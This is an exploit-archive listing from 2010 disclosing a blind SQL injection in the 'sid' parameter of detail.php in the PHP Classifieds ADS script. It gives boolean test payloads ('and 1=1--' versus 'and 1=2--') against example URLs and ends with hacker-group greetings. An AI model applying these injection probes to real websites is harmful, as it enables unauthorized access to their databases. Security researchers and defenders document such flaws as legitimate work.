PHP Classifieds ADS (sid) Blind SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP Classifieds ADS (sid) Blind SQL Injection Vulnerability
# Published : 2010-09-04
# Author : BorN To K!LL
# Previous Title : PHP Classifieds 7.3 Remote File Inclusion Vulnerability
# Next Title : mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit

[~] Title:    PHP CLASSIFIEDS ADS
[~] Price:   $49
[~] Link :   http://www.sellatsite.com/sellatsite/phpclass.asp
[~] Author:    BorN To K!LL - h4ck3r
[~] 3xploit:

/detail.php?sid=[Blind-Injection]

[~] 3xample:

http://www.example.com/classi/detail.php?sid=80 and 1=1--             // True ,,

http://www.example.com/classi/detail.php?sid=80 and 1=2--            // False ,,

[~] Greetings:

string Greetings[x] = ("Dr.2" , "Q8 H4x0r" , "AsbMay's Group" , "darkc0de team" , "and all my friends");